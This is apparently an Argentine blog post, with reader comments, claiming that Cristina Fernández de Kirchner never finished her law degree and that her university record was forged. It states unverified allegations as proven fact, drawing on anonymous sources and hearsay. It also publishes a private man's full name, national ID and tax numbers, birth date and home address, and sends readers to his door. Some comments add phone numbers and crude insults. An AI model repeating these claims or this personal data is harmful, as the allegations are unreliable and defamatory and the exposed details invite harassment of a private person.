CRISTINA NO ES ABOGADA , DEBE 22 MATERIAS

Mas importante que el titulo es el Tomo y Folio , así como el analítico.

Un aporte al Jurista Sabsay y al periodista Christian Sanz que investigó el tema, lo mismo que Opi Santa Cruz Luis Gasulla y varios más.
El tema es que ella después de quedar embarazada y cuando Néstor estaba recién recibido , se van a sur …

  • “el título universitario de Cristina no existe” pues “no se recibió y se quedó debiendo 22 materias”. Cristina ingresó en 1972 a la Universidad de La Plata y en 1975 se fue al sur y “acordaron que estudiara Néstor”. “Él dijo que quería recibirse para ir a gobernar la provincia”. –
  • A los seis meses, 9 de mayo de 1975, la pareja se casó y todo indica que se despojaron de las utopías revolucionarias. Los ingresos de la joven familia provenían de un puesto de “ñoqui” en el Ministerio de Bienestar Social. Kirchner terminó su carrera y con Cristina embarazada, volvió a Gallegos;
  • Máximo Nace el 16 de Febrero de 1977 .Cristina Elisabet Fernández de Kirchner, con DNI Nº 10.433.615, nacida el 19 de febrero de 1953, cuando era Senadora Nacional, acreditaba en su Currículum Vitae presentado en el Congreso de la Nación ser “Abogada, Facultad de Ciencias Jurídicas y Sociales, Universidad Nacional de La Plata”, aunque increíblemente no se menciona el año en que se recibió.

Este fue uno de los temas silenciados en la pasada campaña electoral que le sirvió a ella para acceder al Sillón de Rivadavia. Dos investigaciones periodísticas, una iniciada por Christian Sanz y Carlos Forte y otra por Guillermo Cherasny, empezaron a sembrar dudas sobre el título con el que la actual primera mandataria tanto ha gustado hacerse llamar. Estos periodistas solicitaron por nota a las Autoridaes de la Universidad Nacional de La Plata una copia del certificado analítico de la carrera hecha por la Sra. Fernández, pero nunca recibieron respuesta alguna de parte de las autoridades académicas.
Las sospechas no son pocas y se basan en la nula existencia de documentos firmados por Cristina Fernández en su carácter de abogada, como así tampoco consta la inscripción e la Presidente en los Colegios de Abogados de La Plata y de Río Gallegos. Sobre la investigación que llevó a cabo, Christian Sanz declaró “sólo encontramos datos de que cursó hasta tercer año en la Facultad de Derecho, pero no hay alumnos ni profesores que aseguren que se recibió de abogada. Tampoco está matriculada en ningún colegio de abogados del país, ni siquiera en la provincia de Santa Cruz” (que no tiene colegio de abogados pero, de todos modos, no consta en ninguna cámara federal de abogados)

Daniel Gatti, un prestigioso periodista de Santa Cruz, es el mejor biógrafo de Néstor Kirchner. Hace algunos años escribió un documentado libro llamado “El amo del feudo”, donde da cuenta de las andanzas del actual mandatario y su esposa desde que ambos acusaban temprana edad.

Allí habla de los días de estudio de Cristina: “En La Plata, (Kirchner) conoció a otra estudiante de Derecho, tres años menor, nacida el 19 de febrero de 1953, simpatizante de la JP, con la que formó pareja. A los seis meses, 9 de mayo de 1975, la pareja se casó. Los ingresos de la joven familia provenían de un puesto de ‘ñoqui’ en el Ministerio de Bienestar Social. Kirchner terminó su carrera y con Cristina embarazada, volvió a Gallegos; ella demoraría otros dos años en recibir su título.

La verdad es que nuestra Reina Cristina no está inscripta en el colegio público de Abogados de la Capital Federal ni en ningún Colegio de Abogados de la Provincia de Buenos Aires. En Río Gallegos, si bien no existe Colegio de Abogados, debería haberse inscripto en el Tribunal Superior de Justicia, lo cual no ha hecho jamás.
Para despertar más sospechas, tampoco está inscripta como abogada responsablemente “autónoma” ni como “monotributista”, por lo que jamás pudo haber facturado en la profesión. Sólo aparece inscripta supuestamente como abogada en la Cámara Federal de Apelaciones de Comodoro Rivadavia bajo el Tomo 57 y el Folio 322, lo cual tampoco es muy claro, ya que nunca ejerció en dicho lugar.
En caso de no ser abogada y haber firmado como tal en Comodoro Rivadavia, estaríamos frente a un grave delito. Asimismo, si hubiese sido abogada cuando, junto con Néstor Kirchner, abrieron en el año 1976 un Estudio en Santa Cruz, tendría que haberse inscripto y hubiese firmado presentaciones, escritos o documentos referentes a la profesión. En ninguna causa tramitada en la Ciudad de Río Gallegos aparece Cristina de Kirchner como abogada
Sólo una poco confiable fuente (por su evidente oficialismo) de la Universidad de La Plata admitió que estaría inscripta en los libros de la misma como que se habría recibido en octubre de 1979, aunque no quiso facilitar documento alguno ni permitió que se consultaran los libros de actas de la facultad
Para generar más sospechas, llama la atención que en el curriculum vitae personal de la primera dama en vez de decir que “se recibió de abogada en la Facultad de Ciencias Jurídicas y Sociales”, dice que “cursó estudios de abogacía en la Facultad de Ciencias Jurídicas y Sociales

Te vas a matar estudiando y no vas a mencionar en ningún lugar la fecha, siquiera el año de recibirte…¿?

En sentido similar, ha opinado Graciela Brunetti, quien ha compartido anécdotas de infancia con Cristina de Kirchner y las ha reflejado en un foro de Internet: ‘miente con su título de abogada, nunca se recibió. Ni siquiera nació en La Plata. Nació en Tolosa, en casa de una partera cerca de la casa de mis abuelos.

Hubiera sido una chica común y corriente si no hubiera sido por su madre, que quería que ascendiera socialmente. Ahí nacen todas sus inseguridades y, por ende, sus mentiras. Aprendió de su madre a despreciar a su padre, un chofer de colectivo, trabajador, radical y simpatizante de San Lorenzo. Llena de presunciones y complejos, no encajó en ningún grupo platense.

Terminó haciendo carrera en los centros de estudiantes del interior, a los que era fácil conquistar y donde no había competencia, porque las chicaseran más tímidas.(…)

Con el golpe militar y una vez casados la joven pareja, se refugió en una casa en City Bell hasta que Néstor se recibió, y se fueron al sur. Ella nunca volvió a rendir materias ni nada que se le pareciera. A menos que se haya recibido por ósmosis o Internet, no es abogada’

Por otro lado, posteriormente se conoció una ficha borrosa como otorgamiento del titulo de abogada de la Sra Kirchner… observenlo por

La fecha de nacimiento está claramente escrita sobre otra anterior (19 de Febrero de 1953 es la fecha de nacimiento de CK pero abajo se ve borroneado un 10 de Agosto de 1989) y la matrícula, que es el DNI de la Primera mandataria, está tipeada sobre otro número matrícula, que también está claramente borroneada.

En sentido similar, una importante fuente consultada por este tema, relacionada al Ministerio de Educación de la Provincia de Buenos Aires, confirmó que el título de Cristina posee debajo un número de documento diferente: “evidentemente esa ficha es de alguien más y la ‘trucharon’. Si mirás bien, el número real es 8.164.080, creo que pertenece a una persona salteña que estudió en La Plata”
Los datos del analítico que figura adulterado corresponde a un ex estudiante de la UNLP de derecho :

 

CtesAlDia_186255_1000x500_fit
Nombre: OLMOS VALENTIN
Identificación: CUIT 20-08164080-8
Documento: DNI 8164080
Fecha nacimiento: 16/12/1943 (70 años)
Sexo: Masculino
Actividad principal: 522210 – Venta al por Menor de Carnes Rojas, Menudencias y Chacinados Frescos
F. Inicio: 15/03/1999
Jubilado/Pensionado: Si
Domicilio fiscal: Juan Monje Ortega 2839 (4400) – Salta – Salta
MAS DATOS:

¿A quién corresponde el tomo y folio que aparece en la documentación de finalización de estudios de Cristina Elizabeth Fernández de Kirchner?. Parece que corresponden a una abogada llamada Silvina García, dato sencillo de verificar por cualquiera que consulte los datos en el Colegio Público.

 

 

Lo cierto es que al parecer, los datos consignados de tomo y folio de finalización de los estudios, “no es la única falsificación que se llevó adelante para intentar cubrir la falta de titulación de la “Reina Cristina”, como ahora la llaman sus “acólitos”.

 

También se habría “truchado” la supuesta ficha de entrega de título de la Universidad de La Plata, ya que la fecha de pago que muestra el documento es de un día feriado, como el 12 de octubre. ( ¿Era feriado en ese entonces?).

 

Ese día, desde hace tiempo y más en aquella época, en plena dictadura militar, no funcionaron las oficinas administrativas de esa casa de estudios. Además, claramente se observa cómo se han borroneado los datos de su verdadero titular Valentín Olmos y se pusieron encima los de la hoy “Reina de la Nación”.

 

También la fecha de nacimiento está claramente escrita sobre otra anterior. El 19 de Febrero de 1953, fecha de nacimiento de Cristina Kirchner, está sobreimpresa, pero se ve borroneado un 10 de Agosto de 1989. La matrícula, que es el DNI de la Presidente, está “tipeada” sobre otro número matrícula, que también está claramente borroneada”.

6134_1043

 

 

CtesAlDia_186258_1000x500_fit

Entonces, lla matrícula que se arroga Cristina, pertenece a Valentín Olmos y solo habría que dirigirse a la calle Juan Monje Ortega 2839, en la provincia de Salta, para hablar con el propio Olmos “quien confirmará la adulteración de la que fue víctima”.

 

Es obvio que como puede verse, el fraude es totalmente verificable y solo la única persona que podría “desactivarlo o desmentirlo”, es la Presidente mostrando su título o por lo menos su certificado analítico, cosa que jamás hará porque carece de ambos elementos.

 

Incluso en este link

http://cpacr.org.ar/nuevo/index.php?option=com_content&view=article&id=49&Itemid=57, se puede acceder al listado de Abogados de Comodoro Rivadavia, ya que en Santa Cruz, no existe un Colegio de Abogados donde los profesionales se matriculan, pero si lo tienen que hacer ante el órgano máximo de Justicia de esa provincia.

 

Otro dato descubierto por otros colegas da cuenta de que, “Cristina Elisabet Fernández de Kirchner, titular del Documento Nacional de Identidad Nº 10.433.615, con domicilio en la calle Alcorta Nº 321 de la Ciudad de Río Gallegos, no está inscripta en el colegio público de Abogados de la Capital Federal ni en ningún Colegio de Abogados de la Provincia de Buenos Aires. En Río Gallegos, si bien no existe Colegio de Abogados, debería haberse inscripto en el Tribunal Superior de Justicia, lo cual no ha hecho jamás”.

 

Pero tampoco está inscripta como abogada responsablemente “autónoma” ni como “monotributista” ante la AFIP, por lo que jamás pudo haber facturado en la profesión, lo que invalidaría lo de “abogada exitosa”.

 

“SERVICIOS DE ASESORAMIENTO, DIRECCIÓN Y GESTIÓN EMPRESARIAL

Recién se inscribe bajo el CUIT: 27-10433615-4, en Río Gallegos (Santa Cruz) en el año 1994, dando de alta la exención al IVA en julio de 2008, al igual que en Ganancias Personas Físicas y adherida al Régimen de Trabajador Autónomo.

 

Sin embargo su actividad Principal, hoy 14 de septiembre de 2012 y según el nomenclador de la AFIP, el 741401 (F-150) es para “Servicios de asesoramiento, dirección y gestión empresarial realizados por integrantes de los órganos de administración y/o fiscalización en sociedades anónimas

Secundaria(s)”.

 

Sin embargo según datos extraídos el 30 de Mayo de 2011, daban como Domicilio Fiscal, Alcorta y Piedrabuena y como Actividad específica: Servicios inmobiliarios realizados por cuenta propia.

 

“Sólo aparece inscripta supuestamente como abogada en la Cámara Federal de Apelaciones de Comodoro Rivadavia bajo el Tomo 57 y el Folio 322, lo cual tampoco es muy claro, ya que nunca ejerció en dicho lugar”, asegura Sanz.

 

Otro dato que se menciona es que, “si hubiese sido abogada cuando junto con Néstor Kirchner, abrieron en el año 1976 un Estudio en Santa Cruz”, para quedarse con las casas de ciudadanos entrampados en la 1050 de Martínez de Hoz, “tendría que haberse inscripto y hubiese firmado presentaciones, escritos o documentos referentes a la profesión”, pero en ninguna causa tramitada en la Ciudad de Río Gallegos aparece Cristina de Kirchner como abogada, se indica.

 

Y como ya es una costumbre en este país, la denuncia por “usurpación de títulos y honores” que pesaba en su contra presentada por el periodista Cristian Sanz, cayó en manos del Juez Oyarbide, quien “con tantas causas en su Juzgado”, cajoneó el expediente, cuando en realidad es otro gran “gesto” del magistrado hacia este gobierno kirchnerista.

///

 

Para terminar la escritora Graciela Brunetti, autora de una polémica novela “Arreglate como puedas” que revela el pasado oculto de la Presidenta de la Nación, Cristina Fernández de Kirchner, relató la censura que sufrió su libro en el país –

Lo hizo en el programa Ahora es nuestra la Ciudad, conducido por Luis Gasulla y que se emite por FM Identidad 92.1. Allí, Brunetti relató su vivencia con la frustrada distribución de su libro “maldito” y algunos detalles del pasado de Néstor Kirchner a mediados de los setenta en La Plata. –
LA PRUEBA MAS FUNDAMENTAL PARA DECIR QUE NO ES ABOGADA , ES QUE NO HAY “PRUEBAS DE LO QUE LO ES” !
Escuchen atentamente la entrevista, particularmente en  la parte 2 , en el minuto 5 en adelante, dice que “CFK”  salia a levantar chicos con plata. También el minuto 2 es muy interesante …

TEMA RELACIONADO:

CRISTINA NO ES ABOGADA – POR SABSAY ( VIDEO EN LA CONFERENCIA DE IDEA)

Comments

329 Comments

  1. ciudadana dice:

    No se porque estos señores hacen tanto escándalo con el titulo,ellos son abogados, médicos e incluso bioquímicos, no han hecho ningún postgrado y se hacen llamar doctores

    • Yope dice:

      Los abogados por decreto o algo asi pueden ser llamados sin posgrado ,lo que la verdad es un insulto al que si hce un doctorado, el resto es porque la gente es “tonta” y muchos no saben la diferencia, ademas de que ya esta inculcado

      • Augusto dice:

        La conpaniera Cristina e abogada y dotora …sino el turco Assis no le diría dotora. No no olbidemo que lo tano cuando benian a la Argentina, heran albanile y se hacían yamar “enyeniere”.

      • LUCILA PERLENDER dice:

        Para tener derecho a que te califiquen de Doctor en Abogacía, tenés que presentar una tesis de especialización que pasa a consideración de una Junta calificadora. En cuanto a quien dijo “simple contador”, es evidente que ignora los estudios que supone obtener ese título. Sólo por costumbre se les dice “doctor ” a los abogados. Los médicos son “Doctores en medicina al margen de cualquier otra especialización que hagan luego y por la cual se les otorgará la certificación correspondiente. También tenemos Licenciados en Economía o en Ciencias Políticas, Para obtener el doctorado también deben hacer estudios complementarios y publicar una tesis

      • LUCILA PERLENDER dice:

        Para tener derecho a que te califiquen de Doctor en Abogacía, tenés que presentar una tesis de especialización que pasa a consideración de una Junta calificadora. En cuanto a quien dijo “simple contador”, es evidente que ignora los estudios que supone obtener ese título. Sólo por costumbre se les dice “doctor ” a los abogados. Los médicos son “Doctores en medicina al margen de cualquier otra especialización que hagan luego y por la cual se les otorgará la certificación correspondiente. También tenemos Licenciados en Economía o en Ciencias Políticas, Para obtener el doctorado también deben hacer estudios complementarios y publicar una tesis

    • hernan dice:

      jajaja…..hacer un postgrado no es hacer un doctorado…..jajajaja.

      Doctorado es una institución particular, que consiste, realizar una tesis, y defenderla ante un jurado. Postgrado es todo curso, oficial, que se hace, relacionado con la profesión que se tiene.

      • OMAR dice:

        HERNAN, PARA SER DR. TENES QUE HACER LOS SIGUIENTES POSTGRADOS Y EN ESTE ORDEN.
        1-LICENCIATURA
        2-MAGISTRATURA
        3-DOCTORADO

        EN TODOS ELLOS DEBES PRESENTAR TESIS Y DEFENDERLA. EL QUE SE HAGA LLAMAR DR. SIN SERLO, COMETE EL DELITO DE USURPACION DE TITULOS PUBLICOS. LO MISMO PARA AQUEL QUE SE HAGA LLAMAR ABOGADO SIN SERLO.

        UN PLACER COLABORAR CON EL CONOCIMIENTO.

        • Darksuke dice:

          Para que lo sepan Doctor se le pueden decir a los Medicos y a los Abogados por simple hecho de costumbre o como explica la real academia española coloq. Médico / Abogado, aunque no tenga el grado académico de doctor.
          Y la verdad es una chanchada una nota de esta envergadura. La gente se presta para todo.

    • Federico Urbach dice:

      La que firma como ciudadana, buenos seria reflejar su nombre–Por cierto que el Medico, Abogado,Contador(este desde hace pocos años) se los llama DOCTOR –No solo lo puden hacer, sino que legalmente lo pueden hacer publico-Los Contadores hace porcos años que luchando por ser nominados Doctores, han logrado el cometido-Es bueno informarse-
      Yo tambien me pregunto entonces que les queda alos del nivel superior,
      Se indica que deben poner DOCTOR EN MEDICINA-DOCTOR EN JURISPRUDENCIA- DOCTOR EN ECONOMIA,ETC

    • Andy dice:

      Porque denunciaron a Juan Carlos Blumberg ante la justicia. por dejarse llamar ingeniero, aunque nunca falsificó nada. Para el gobierno era más importante que el asesinato de su hijo y la inseguridad y lo usó para descalificar sus justos reclamos.
      Reclamaron memoria? Tenemos MEMORIA.

    • Gabriel dice:

      Que raro que el odio del grupo Clarin diga cosas lindas. Osea que en las próximas elecciones si hay opiniones opuestas al grupo Clarin van a atacar a otro u otra no ?
      Patéticos que no se miran el culo sucio que tienen todos . Como dice la biblia
      NO MIRES LA PAJA EN EL OJO AJENO, SI NO LA VIGA EN EL TUYO PROPIO”

    • CARLOS, MARIA EUGENIA VES LOSADA Y SEBASTIAN LIMERES ABOGADO dice:

      NO TIENE NINGUNA IMPORTANCIA QUE CRISTINA SEA O NO ABOGADA, VOS VOTA POR ANIBAL FERNANDEZ GOBERNADOR DE BUENOS AIRES

      • Hector Chingolo dice:

        Si tiene importancia si tiene el titulo no, porque entiendo que cobra un plus por tenerlo. No es así?y en ese caso esta afanando esa guita, esta claro?
        Ademas cual es el curriculum de anibal haberse escapado de la justicia en el baul de un auto? ademas ya perdio con una mina que necesita un GPS para ir a Avellaneda, no es cierto?

        • MARIA SILVIA VES LOSADA dice:

          YO MARIA SILVIA VES LOSADA NACI CUANDO UN GRAN HOMBRE EL COMISARIO GENERAL DON JOSE LOPEZ REGA ERA MINISTRO DE BIENESTAR SOCIAL Y FUNDO LA TRIPLE A PARA SALVAR A ARGENTINA DEL COMUNISMO Y CARLOS VES LOSADA, HOY MI PADRE, ERA INFORMANTE DE ESTA HEROICA LUCHA, QUE LO COMPENSO DANDOLE UNA HIJA, YO.
          POR ESO ME CASE EN HONOR DE SAN JOSE LOPEZ REGA CON EL HIJO DE UN COMISARIO DE LA MISMA FUERZA, LA POLICIA FEDERAL.
          CREO QUE ESO DA PAZ A MI ALMA AL CONFESARLO Y HAGO MUY FELIZ A MI PADRE CARLOS VES LOSADA Y A MI SUEGRO COMISARIO DE LA POLICIA FEDERAL ARGENTINA, QUE CUYO NOMBRE POR AHORA RESERVO.
          VIVA JOSE LOPEZ REGA, VIVA LA TRIPLE A, VIVA MI SUEGRO COMISARIO GENERAL DE LA POLICIA FEDERAL.
          LUEGO EN EL PROCESO DE REORGANIZACION NACIONAL, FUE SERVICIO DEL BATALLON DE INTELIGENCIA 601 Y ESO LE DIO DESDE EL POZO DE BANFIELD, LA SEGUNDA HIJA, MI HERMANA MARIA EUGENIA VES LOSADA, HOY ABOGADA.

    • CARLOS VES LOSADA ABOGADOS dice:

      YO ABOGADO EGRESADO DE LA UNIVERSIDAD DE LA PLATA CONSEGUI EL TITULO DANDO LASTIMA A LOS COMPAÑEROS DE MI PADRE QUE FUE UN DECENTE ABOGADO EL ESTUPIDO, QUE ERAN PROFESORES Y PODRIA POR LA FUERTE INFLUENCIA QUE TENGO EN EL GAY POWER PODRIA CONSEGUIRLE UN DIPLOMA EN DOS DIAS.
      LLAMAME CRISTINA.
      BESITOS

    • Mercedes dice:

      El “escándalo” es precisamente porque se trata de la “Reina Cristina” no de cualquier otra persona…… obvioooo

    • Mercedes dice:

      El “escándalo” es precisamente porque se trata de la “Reina Cristina” no de cualquier otra persona…… obvioooo

    • yiusi dice:

      Los abogados se hacen llamar doctores ,por una acordada de la corte suprema ,osea que no usurpan un cargo y esta bien llamarlos doctor ,y la de los medicos supongo que es un respeto de la gente hacia esos profesionales ,pero ellos si estudiaron y se recibieron y no usurparon un titulo como la yegua q nos mal gobierna.

    • Anónimo dice:

      Yo tengo una hija que es abogada y no figura en ningun colegio, saben por qué? Porque los colegios de abogados les curran un 50 % de sus ingresos…Es más si la pareja es tambien abogado, con que figure uno es suficiente, trabajan dos y solo uno paga. No me importa lo que uds digan muchachos, son servicios o ex servicios, siempre trabajaron para los que odian al pueblo…Miren sino lo que hicieron, coolocaron un presidente con 214 causas judiciale, doblemente procesado y ? ¿Por qué no lo investigan a él? ¿Por qué le siguen dando a Cristina? Ya calmense, son de manual. Sds.

      • yo dice:

        HUUUU CORTALA CON MACRI CLARO CULIAO, A LA VIEJA LE IMPORTA TRES CHOTAS QUE OPINAS VOS SI ES MILLONARIA CLARO CULIAO VO TE TENI Q LEVANTA TEMPRANOP SINO NO PAPIAS CULIAO

    • Tiquillo dice:

      LA diferencia es que deir Dr. a alguien q no lo es es una mala costumbre, solo eso. Hacerse pasar por profecional es un delito grave y pagado con carcel. Así de simple…

    • GABYMEN dice:

      DISCULPEN…..SOY BIOQUIMICA,FARMACEUTICA Y DIPLOMADA EN DERMATOCOSMETICA….JAMAS PERMITI QUE SE DIRIJAN AMI COMO DRA…..ES MUY FUERTE…INTENTE HACER LA ESPECIALIDAD EN INMUNOLOGIA Y NO PUDE LOGRARLO POR CUESTIONES PERSONALES..PERO SOLO PARA SER ESPECIALISTA,,,DEBIA CUMPLIR 3000 HS.EN UN LABORATORIO ESPECIALIZADO,COMO MINIMO CINCO CURSO DE ACTUALIZACION DURANTE ESE PERIODO,CUMPLIR CON DOS CLASES MENSUALES DE LA ESPECIALIDAD DONDE CADA COLEGA EXPONIA UN TEMA INEDITO OSEA EN ESTUDIO…DEBIA PREPARAR UNA EXPOSICION ANUAL PARA ESTAS BIBLIOGRAFICAS PRESENCIALES OBVIO…LUEGO DE APROXIMADAMENTE TRES AÑOS DE TODO ESTE TRAJIN,DEBIA PREPARAR UNA MONOGRAFIA CON NO MENOS DE CINCUENTA CITAS BIBLIOGRAFICAS (OJO..NO VALIA SOLO LOS ABSTRAC ERA EL TRABAJO COMPLETO)..COMO SI TOD FUESE POCO DEBIA PRESENTAR UN TRABAJO CIENTIFICO INEDITO(OSEA QUE NADIE LO HUBIESE INVESTIGADO ANTES)LUEGO DEFENDERLO…..Y POR ULTIMO AL FINAL,,UN EXAMEN ORAL Y ESCRITO FRENTE AL TRIBUNAL DE ESPECIALISTAS..SI TODO ERA CORRECTO…..RECIEN PODIA PERMITITRME SER LLAMADA “ESPECIALISTA”….YO QUEDE EN LA MONOGRAFIA…NO LO LOGRE…PERO CLARO ES CS.QCAS. DE LA CIUDAD DE CORDOBA AÑO 1999…DRA????NO LO MEREZCO…GRACIAS POR LEER…BUEN COMIENZO DE AÑO…

    • Augusto dice:

      Ciudadana, tené rason, a la conpaniera Cristina ay que defenderla de la derecha corruta, Lo inportante no e el título, cino lo que iso por lo povre …Recistensia con awante!!!

    • MARÍA EUGENIA VES LOSADA dice:

      ESO NO ES IMPORTANTE, LO IMPORTANTE ES LIZY TAGLIANI A UNA VERDADERA DIOSA, POR ESO FUNDO EL CLUB DE ADMIRADORES DE LIZI TAGLIANI EN TUCUMAN 766, 2 PISO OFICINA 192 DE LA CABA, LUGAR DONDE TE ESPERO TODAS LAS TARDES PARA INSCRIBIRTE COMO SOCIO ACTIVO O PASIVO Y DARTE TU CREDENCIAL DE SOCIO ACTIVO Y PASIVO, RECIBIENDO TU PEQUEÑA DONACIÓN EN EFECTIVO DE 1OO DOLARES BESITOS
      FUNDADOR Y PRESIDENTE DR CARLOS VES LOSADA
      SECRETARIAS DRA MARÍA EUGENIA VES LOSADA Y MARÍA SILVIA VES LOSADA.
      EJECUTIVO Y COORDINADOR GENERAL DR SEBASTIAN LIMERES ABOGADO
      FUNDADOR Y DIRECTOR
      CARLOS VES LOSADA
      TELÉFONOS PARA TODO TIPO DE CONTACTOS
      43220445
      43267492
      41620021

  2. JUAN dice:

    DEBERIA HACERLE JUICIO DE ETICA Y QUE RENUNCIE A LA PRESIDENCIA YA QEU MUCHA GENTE LA VOTO POR SER DR Y NO LO ES !!!! ADEMAS ELLA DIJE QUE SU FORTUNA VENIA POR SER UNA EXITOSA ABOGADA ENTONCES DEBERÁ DEMOSTRAR DE DONDE VIENE LA PLATA REALMENTE !!!

  3. Luis C dice:

    Los Abogados se hacen llamar Doctores por una vieja acordada de la Camara que lo permite y a los médicos se les dice Doctor por costumbre no por que usurpen un titulo. Hay una gran diferencia a no haber obtenido el titulo y decirse abogada.

  4. Eze dice:

    Un error en este texto hace que desconfíe en todo el resto.

    “También se habría “truchado” la supuesta ficha de entrega de título de la Universidad de La Plata, ya que la fecha de pago que muestra el documento es de un día feriado, como el 12 de octubre.”

    Este parrafo refiere al 12/10/1979, pero el feriado del 12 de octubre se sancionó en 1982 (http://www.infoleg.gob.ar/infolegInternet/verNorma.do?id=140416), por lo que no fue feriado ese año.

    Este error demuestra que esta investigación está sugestionada y no se hizo con la debida precisión.

    • admin dice:

      La mejor prueba de que no es abogada es que no hay NINGUN “PAPEL” QUE DEMUESTRE QUE LO ES … ironico verdad… No es abogada por eso lo recalca en los discursos. Lo sabe y sabe que mucha gente tambien “lo sabe”,Por mas que falsifique los datos burdamente . la UNLP no se va a prestar a eso.

      • Ivan dice:

        Creo que estas mal informado, y con poca historia sobre la argentina.

        Hipolito Irigoyen, en su primera presidencia, promulgo el 4 de Octubre de 1917, como 12 de Octubre, Día de la Raza, y declaro ese día como “Fiesta Nacional”, ademas, se Sanciono: 9 de junio de 1976 – Promulgación: 9 de junio de 1976 – Boletín Oficial: 14 de junio de 1976 – Extracto: Feriados
        Nacionales y Días no Laborables:Artículo 1º.- Establécense como días feriados y no laborables en todo el territorio de la
        Nación los siguientes: Feriados Nacionales: 12 de octubre.

        O sea, en argentina es Feriado el 12 de Octubre desde hace casi 100 años.

        • Darksuke dice:

          Publicada en el Boletín Oficial del 11-oct-1982
          Resumen:
          INSTITUYESE COMO FERIADO NACIONAL EL DIA 12 DE OCTUBRE.

          Observaciones:
          ABROGADA POR EL ARTICULO 9° DEL DECRETO 1584/2010, B.O. 03/11/2010, PAGINA 1. cambia de nombre.

    • silvia dice:

      Eze, yo nací un 12 de octubre y mi cumpleaños siempre fue feriado. Lo que sucedió después fue pasarlo a un lunes, como los demás feriados, para favorecer el turismo. Pero antes de eso, el 12 de 0ctubre SIEMPRE era feriado, cayera en el día que cayera y se llamaba Día de la Raza.

    • Ana dice:

      EZE SIEMPRE FUE FERIADO, ANTES LOS FERIADOS ERAN EN EL DIA CORRESPONDIENTE Y NO “PASABAN” AL FIN DE SEMANA COMO AHORA.

    • Gerardo dice:

      el 12 de Octubre es feriado desde mucho antes de 1982. Quien te contó esta histoa de los feriados ????

    • hernan dice:

      jajaja, ni sabés leer el mismo link que dejaste.

      La ley que citas es modificatoria de la ley 21329 del año 1976, que ya tenía decretado el 12 de Octubre como feriado no laborable. Pero, no fue esa ley la que determinó a esa fecha como feriado no laborable. El Decreto/Ley 2446/1956 ya tenía como feriado y no laborable, a la fecha del 12 de Octubre, porque era considerado el día de la Raza (un error gigantesco, porque las razas, como su concepto que se quiso imponer, no existen).

      Por lo tanto, la investigación no está tan alejada.

      Pero, no es necesario saber si esta mujer tiene o no título o el analítico. Con sólo escucharla cualquiera que es abogado se da cuenta que NO es abogada, porque no maneja terminología forense.

      Lo mismo que Anibal Fernandez, que hay grandes sospechas de que compró su título. Y otros, como Menem.

      Muchos son los que han comprado el título de Abogado.

      • felix dice:

        Los títulos de Abogado los venden en la Universidad de Morón,se pide audiencia con el Vice-decano y se arreglan loe exámenes, te dan las preguntas y respuestas , y de esa manera se convierten en exitosos abogados El gobernador Scioli tiene entre sus séquitos a un abogado trucho o sea compró el título, el Ministerio de Educación y Justicia tendría que hacer una evaluación sobre los recibidos en la Universidades privadas y luego sí otorgar los títulos y además se mandó un curro (afano) millonario en la puesta en marcha de Télam TV cuyas oficinas hubieran funcionado en Av. Córdoba y Rodriguez Peña y esa guita la desvió a Aventura ( Miami) donde compró Dptos. en Trumps Hotel y en Bs.As. en La Lucila (Olivos); 2 Prop. En Recloeta ,Av.Quintana al 560 2do y 5to piso,ademá de una flotita de vehículos Toyota , se mueve en un Hilux 4×4 cuya matrícula termina en 255, o sea Scioli tiene a un verdadero delincuente y posible valijero y testaferro, ahh antes era culo y calzón con Aníbal Férnández creo que éte lo superó a bigote y ahí su alejamiento

    • Anónimo dice:

      Eze, el 12 de octubre siempre fue feriado, yo hice toda la primaria, la secundaria y parte de mis estudios universitarios antes de 1982 y no tengo la menor duda.

    • Anónimo dice:

      Los borrones en que año se sancionaron?? jajajaja.

  5. BAY LUIS MARIA dice:

    Soy medico trabajo desde antes de recibirme y sieste hecho es real DEBE EXPEDIRSE EL COLEGIO DE ABOGADOS DE LA REPUBLICA ARGENTINA Y DEBE SER SANCIONADA CON TODO EL RIGOR DE LA LEY PORQUE HAN ESTAFADO A 40.000 MILLONES DE ARGENTINOS. QUE SEA JUSTICIA.

    • Anónimo dice:

      40 millones , de argentinos, humildemente digo.

    • Anónimo dice:

      en este país quien te va dar pelota no hay justicia..

    • Darksuke dice:

      Por dios cuanta ignorancia, cualquier persona q reuna las condiciones puede ser presidente y no necesita ser abogado.. pero mas alla de eso…. esta nota es una mentira que engancha personas credulas. si fuera verdad ya la hubieran sacado muchos antes; por dios gente, que a caso no piensan?, hay personas mas poderosas que los tienen como titeres con estos argumentos efimeros.

  6. Santiago dice:

    Sinceramente no sé de que estafa hablan. Creen que Cristina gano las elecciones por ser abogada? Creen que el 54% de la gente la voto solo por tener título?
    No señores, en 2007 gano por ser la sucesora de Nestor y en 2011 gano porque era por lejos la mejor opción ante una oposición tan nefasta.
    En fin, sigan pensando que por eso Cristina es presidente… como si con eso cambiará algo. Saludos!

    • Jose Luis dice:

      Tenés razón dejate operar por un cirujano que no es cirujano, y si te morís no es problema porque vos lo elegiste. Cuanto se puede legitimar una persona que no dice ser lo que es? Y menos si llegara a ser presidente, si comenzó mintiendo con esto, quién te dice que no haya mentido con todo y nos haya robado toda la guita. Vos confías de las personas cercanas que te mienten? Eso es lo importante.

      • jose luis dice:

        Tenes razon, si el medico es bueno o malo, lo importante es el titulo, ese cirujano mato a 10, pero tiene titulo, que me opere. como le gusta buscar la vuelta.la elijieron de presindenta, no de fiscal, ni juez . nadie la voto por ser abogada, y cuando ,mañana te muestre el titulo van a decir que lo trucho, y cuando te traiga a los 32 compañeros de curso de testigo van a decir que estan amenzados o que son de la campora. puff se ve muy trucho todo esto

        • omar carceller dice:

          erras feo, fijate que por ley, en nuestro pais, ARGENTINA, para ostentar la presidencia es requisito estar colegiado en alguna profesion universitaria. tema terminado, si no tiene titulo, ESTOS AÑOS FUERON UNA ESTAFA

          • Fernando dice:

            ¿Desde cuando es requisito para ser presidente tener un título universitario, Omar?.

          • Juan Pablo dice:

            El problema es que fue la explicación de su fortuna cuando un estudiante de la Universidad de los EEUU, en casi la única vez que se la pudo interpelar públicamente, dijo que el motivo de su fortuna era haber sido una “abogada exitosa”. Ahora, si se demuestra que NO es abogada, porque le faltan 22 materias, simplemente es una presidente mentirosa y sin vergüenza.

        • Alan dice:

